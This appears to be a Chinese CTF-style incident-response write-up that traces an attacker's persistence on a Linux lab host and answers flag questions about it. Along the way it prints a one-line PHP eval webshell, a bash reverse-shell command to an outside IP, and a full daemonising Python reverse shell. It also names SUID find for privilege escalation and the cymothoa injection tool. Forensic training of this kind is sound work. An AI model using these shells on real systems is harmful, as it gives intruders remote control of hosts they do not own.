第三章 权限维持 linux 权限维持 - 隐藏
1
黑客隐藏的隐藏的文件 完整路径 md5
有一点比较好,题目这么说明的话,至少文件隐藏技术不会是 rootkit
在靶机内进行基础的信息收集,发现有 web 服务
root@xuanji:/tmp/.temp/libprocesshider# ls -laig /var/www/html/
total 508
43807940 drwxrwxrwx. 1 www-data 99 Aug 1 2023 .
33813010 drwxr-xr-x. 1 root 18 Jul 31 2023 ..
33811524 -rwxrwxrwx. 1 www-data 8371 Jul 20 2023 Writenote.php
43807941 -rw-r--r--. 1 www-data 483403 Aug 1 2023 adminer.php
33811525 -rwxrwxrwx. 1 www-data 124 Jul 20 2023 common.php
43797312 drwxrwxrwx. 1 www-data 79 Jul 20 2023 css
51371096 drwxrwxrwx. 1 www-data 39 Jul 20 2023 images
33811526 -rwxrwxrwx. 1 www-data 2624 Jul 20 2023 index.php
60152836 drwxrwxrwx. 1 www-data 104 Jul 20 2023 js
33811527 -rwxrwxrwx. 1 root 0 Jul 31 2023 log.php
33811528 -rwxrwxrwx. 1 www-data 8055 Jul 20 2023 search.php
43807942 -rw-rw-rw-. 1 mysql 73 Aug 1 2023 sh.php
43807943 -rw-rw-rw-. 1 mysql 0 Aug 1 2023 tmpubzil.php
43807944 -rw-rw-rw-. 1 mysql 0 Aug 1 2023 tmputsrv.php
43807945 -rw-rw-rw-. 1 mysql 0 Aug 1 2023 tmpuvdzm.php
在其中匹配到了一个 webshell 文件
root@xuanji:/var/www/html# grep -rnw *.php -e 'eval'
sh.php:1:1 2 <?php @eval($_POST['a']);?> 4
查看 web 服务的日志,过滤出 sh.php 文件的访问记录
root@xuanji:/var/log/apache2# cat access.log | grep "sh.php"
192.168.200.2 - - [01/Aug/2023:02:02:31 +0000] "POST /sh.php HTTP/1.1" 200 461 "-" "Mozilla/5.0 (Windows NT 6.2; rv:22.0) Gecko/20130405 Firefox/22.0"
192.168.200.2 - - [01/Aug/2023:02:05:14 +0000] "POST /sh.php HTTP/1.1" 200 461 "-" "Mozilla/5.0 (Windows NT 6.2; Win64; x64; rv:21.0.0) Gecko/20121011 Firefox/21.0.0"
192.168.200.2 - - [01/Aug/2023:02:05:16 +0000] "POST /sh.php HTTP/1.1" 200 349 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36"
192.168.200.2 - - [01/Aug/2023:02:05:29 +0000] "POST /sh.php HTTP/1.1" 200 2840 "-" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_6; fr-fr) AppleWebKit/533.20.25 (KHTML, like Gecko) Version/5.0.4 Safari/533.20.27"
192.168.200.2 - - [01/Aug/2023:02:05:36 +0000] "POST /sh.php HTTP/1.1" 200 2920 "-" "Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36"
192.168.200.2 - - [01/Aug/2023:02:05:38 +0000] "POST /sh.php HTTP/1.1" 200 392 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; FunWebProducts)"
192.168.200.2 - - [01/Aug/2023:02:05:52 +0000] "POST /sh.php HTTP/1.1" 200 314 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:25.0) Gecko/20100101 Firefox/25.0"
192.168.200.2 - - [01/Aug/2023:02:05:54 +0000] "POST /sh.php HTTP/1.1" 200 315 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36"
192.168.200.2 - - [01/Aug/2023:02:06:18 +0000] "POST /sh.php HTTP/1.1" 200 429 "-" "Opera/9.80 (Macintosh; Intel Mac OS X 10.6.8; U; fr) Presto/2.9.168 Version/11.52"
192.168.200.2 - - [01/Aug/2023:02:06:20 +0000] "POST /sh.php HTTP/1.1" 200 374 "-" "Mozilla/5.0 (Windows NT 5.1; U; en; rv:1.8.1) Gecko/20061208 Firefox/5.0 Opera 11.11"
192.168.200.2 - - [01/Aug/2023:02:06:31 +0000] "POST /sh.php HTTP/1.1" 200 317 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F"
192.168.200.2 - - [01/Aug/2023:02:06:33 +0000] "POST /sh.php HTTP/1.1" 200 220 "-" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_6; fr-fr) AppleWebKit/533.20.25 (KHTML, like Gecko) Version/5.0.4 Safari/533.20.27"
192.168.200.2 - - [01/Aug/2023:02:06:34 +0000] "POST /sh.php HTTP/1.1" 200 428 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/5.0)"
192.168.200.2 - - [01/Aug/2023:02:07:28 +0000] "POST /sh.php HTTP/1.1" 200 463 "-" "Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36"
192.168.200.2 - - [01/Aug/2023:02:07:30 +0000] "POST /sh.php HTTP/1.1" 200 206 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.1; ja-JP) AppleWebKit/533.20.25 (KHTML, like Gecko) Version/5.0.3 Safari/533.19.4"
192.168.200.2 - - [01/Aug/2023:02:07:31 +0000] "POST /sh.php HTTP/1.1" 200 474 "-" "Mozilla/5.0 (Windows NT 6.2; Win64; x64; rv:27.0) Gecko/20121011 Firefox/27.0"
192.168.200.2 - - [01/Aug/2023:02:08:17 +0000] "POST /sh.php HTTP/1.1" 200 332 "-" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_7; ja-jp) AppleWebKit/533.20.25 (KHTML, like Gecko) Version/5.0.4 Safari/533.20.27"
192.168.200.2 - - [01/Aug/2023:02:08:20 +0000] "POST /sh.php HTTP/1.1" 200 245 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1623.0 Safari/537.36"
192.168.200.2 - - [01/Aug/2023:02:17:05 +0000] "POST /sh.php HTTP/1.1" 200 416 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36"
192.168.200.2 - - [01/Aug/2023:02:17:09 +0000] "POST /sh.php HTTP/1.1" 200 470 "-" "Opera/9.80 (X11; Linux i686; U; fr) Presto/2.7.62 Version/11.01"
192.168.200.2 - - [01/Aug/2023:02:17:10 +0000] "POST /sh.php HTTP/1.1" 200 209 "-" "Mozilla/5.0 (Windows NT 6.0; WOW64; rv:24.0) Gecko/20100101 Firefox/24.0"
很可惜,没有记录下来 POST 的数据
继续排查,发现 /tmp 目录下存在有进程隐藏工�具
root@xuanji:/tmp/.temp/libprocesshider# ls -laih
total 24K
43807955 drwxr-xr-x. 3 root root 119 Aug 3 2023 .
33813034 drwxr-xr-x. 3 root root 29 Aug 3 2023 ..
51380996 drwxr-xr-x. 8 root root 163 Aug 3 2023 .git
43807964 -rw-r--r--. 1 root root 20 Aug 3 2023 .gitignore
43807965 -rwxr-xr-x. 1 root root 826 Aug 3 2023 1.py
43807966 -rw-r--r--. 1 root root 168 Aug 3 2023 Makefile
43807967 -rw-r--r--. 1 root root 2.9K Aug 3 2023 README.md
43807968 -rw-r--r--. 1 root root 3.4K Aug 3 2023 processhider.c
43807969 -rw-r--r--. 1 root root 243 Aug 3 2023 shell.py
经过确认,文件 1.py 具有执行权限,应当就是攻击者留下的隐藏文件
/tmp/.temp/libprocesshider/1.py --> 109ccb5768c70638e24fb46ee7957e37
即可得到答案
flag{109ccb5768c70638e24fb46ee7957e37}
2
黑客隐藏的文件反弹 shell 的 ip + 端口 {ip:port}
在 /tmp 目录下存在有一个可疑脚本 1.sh
/tmp/1.sh
bash -i >&/dev/tcp/192.168.100.13/777 0>&1
典型的 bash 反弹 shell 指令,但是可惜这个不是隐藏文件
联想到上一步找到的进程隐藏工具,在其中存在有这个文件
/tmp/.temp/libprocesshider/1.py
#!/usr/bin/python3
import socket,subprocess,os,sys, time
pidrg = os.fork()
if pidrg > 0:
sys.exit(0)
os.chdir("/")
os.setsid()
os.umask(0)
drgpid = os.fork()
if drgpid > 0:
sys.exit(0)
while 1:
try:
sys.stdout.flush()
sys.stderr.flush()
fdreg = open("/dev/null", "w")
sys.stdout = fdreg
sys.stderr = fdreg
sdregs=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
sdregs.connect(("114.114.114.121",9999))
os.dup2(sdregs.fileno(),0)
os.dup2(sdregs.fileno(),1)
os.dup2(sdregs.fileno(),2)
p=subprocess.call(["/bin/bash","-i"])
sdregs.close()
except Exception:
pass
time.sleep(2)
很明显,是一个基于 python 实现的 shell 反弹
flag{114.114.114.121:9999}
3
黑客提权所用的命令 完整路径的 md5 flag{md5}
进行推理,攻击者进入靶机的用户态只有两种:www-data 和 ctf 两个用户,那么先检查 sudo 文件的配置
/etc/sudoers
# User privilege specification
root ALL=(ALL:ALL) ALL
# Members of the admin group may gain root privileges
%admin ALL=(ALL) ALL
# Allow members of group sudo to execute any command
%sudo ALL=(ALL:ALL) ALL
# See sudoers(5) for more information on "#include" directives:
#includedir /etc/sudoers.d
明显不存在 sudo 配置缺陷,那么较大概率就是 suid 文件提权
对 suid 文件进行扫描
root@xuanji:/tmp/.temp/libprocesshider# find / -perm -u=s -type f 2>/dev/null
/bin/mount
/bin/ping
/bin/ping6
/bin/su
/bin/umount
/usr/bin/chfn
/usr/bin/chsh
/usr/bin/find
/usr/bin/gpasswd
/usr/bin/newgrp
/usr/bin/passwd
/usr/bin/sudo
/usr/lib/eject/dmcrypt-get-device
/usr/lib/openssh/ssh-keysign
结合 GTFOBins 数据库进行比对,能够进行提权并 getshell 的只有 /usr/bin/find
/usr/bin/find --> 7fd5884f493f4aaf96abee286ee04120
即可得到答案
flag{7fd5884f493f4aaf96abee286ee04120}
4
黑客尝试注入恶意代码的工具完整路径 md5
直接使用正则进行隐藏文件扫描
root@xuanji:/tmp/.temp/libprocesshider# find / -type f -name ".*" 2>/dev/null | grep -v "^\/sys\/"
/etc/.pwd.lock
/etc/cron.d/.placeholder
/etc/cron.daily/.placeholder
/etc/cron.hourly/.placeholder
/etc/cron.monthly/.placeholder
/etc/cron.weekly/.placeholder
/etc/init.d/.legacy-bootordering
/etc/skel/.bash_logout
/etc/skel/.bashrc
/etc/skel/.profile
/etc/mysql/conf.d/.keepme
/home/ctf/.bash_logout
/home/ctf/.bashrc
/home/ctf/.profile
/home/ctf/.bash_history
/root/.bashrc
/root/.profile
/root/.bash_history
/root/.viminfo
/tmp/.temp/libprocesshider/.gitignore
/.dockerenv
扫一眼过去,没有特殊文件,于是扫描隐藏目录
root@xuanji:/tmp/.temp/libprocesshider# find / -type d -name ".*" 2>/dev/null
/opt/.cymothoa-1-beta
/root/.ssh
/root/.cache
/run/secrets/kubernetes.io/serviceaccount/..2024_10_02_01_44_25.3107329127
/tmp/.temp
/tmp/.temp/libprocesshider/.git
/usr/share/php/.registry
在其中注意到这个特殊目录/opt/.cymothoa-1-beta
root@xuanji:/opt/.cymothoa-1-beta# ls -laih
total 580K
9832207 drwxr-xr-x. 3 ctf 1000 16K Aug 3 2023 .
3129178 drwxr-xr-x. 1 root root 30 Aug 3 2023 ..
9832208 -rw-r--r--. 1 ctf 1000 137 May 24 2011 Makefile
9832209 -rwxr-xr-x. 1 root root 14K Aug 3 2023 bgrep
9832210 -rw-r--r--. 1 root root 4.3K May 5 2011 bgrep.c
9832211 -rw-------. 1 root root 412K Aug 3 2023 core
9832212 -rwxr-xr-x. 1 root root 30K Aug 3 2023 cymothoa
9832213 -rw-r--r--. 1 ctf 1000 12K Jul 27 2011 cymothoa.c
9832214 -rw-r--r--. 1 ctf 1000 4.9K Jul 27 2011 cymothoa.h
9832215 -rwxr-xr-x. 1 root root 1.3K May 5 2011 hexdump_to_cstring.pl
17877868 drwxr-xr-x. 2 root root 16K Jul 27 2011 payloads
9832216 -rw-r--r--. 1 ctf 1000 16K Jul 27 2011 payloads.h
9832217 -rw-r--r--. 1 ctf 1000 4.9K May 24 2011 personalization.h
9832218 -rwxr-xr-x. 1 root root 964 May 24 2011 syscall_code.pl
9832219 -rw-r--r--. 1 root root 4.9K May 24 2011 syscalls.txt
9832220 -rwxr-xr-x. 1 root root 9.0K Aug 3 2023 udp_server
9832221 -rw-r--r--. 1 root root 1.4K May 24 2011 udp_server.c
root@xuanji:/opt/.cymothoa-1-beta# ls -laih cymothoa
9832212 -rwxr-xr-x. 1 root root 30K Aug 3 2023 cymothoa
根据文件名,即可确定这个就是注入工具
/opt/.cymothoa-1-beta/cymothoa --> 087c267368ece4fcf422ff733b51aed9
即可得到答案
flag{087c267368ece4fcf422ff733b51aed9}
5
使用命令运行 ./x.xx 执行该文件 将查询的 Exec****** 值 作为 flag 提交 flag{/xxx/xxx/xxx}
很明显,这个指的就是python解释器的具体�路径
flag{/usr/bin/python3.4}